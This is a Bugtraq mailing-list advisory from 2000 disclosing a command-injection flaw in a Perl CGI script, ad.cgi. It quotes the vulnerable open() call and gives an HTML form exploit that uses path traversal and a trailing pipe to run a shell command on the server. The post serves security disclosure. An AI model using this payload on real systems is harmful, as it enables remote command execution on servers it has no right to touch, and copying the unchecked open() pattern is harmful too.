Bugtraq mailing list archives

Previous By Date Next
Previous By Thread Next

Insecure input validation in ad.cgi

From: rpc <h () ckz org>
Date: Mon, 11 Dec 2000 15:10:22 GMT
Hi,

ad.cgi from "Scripts by Tammie's HUSBAND" contains an insecure input validation
vulnerability.

Information on ad.cgi is available at:
http://www.conservatives.net/atheist/scripts/index.html?ads

----code snippet----
$filename = "$FORM{'file'}";
$datafile = "$basedir" . "$filename";
...
open (INFO, "$datafile");
-----------------

Exploit:

<html>
<form action="http://www.conservatives.net/someplace/ad.cgi"; method=POST>
<h1>ad.cgi exploit</h1>
Command: <input type=text name=file value="../../../../../../../../bin/ping -c
5 www.foo.com|">
<input type=submit value=run>
</form>
</html>
Previous By Date Next
Previous By Thread Next

Current thread: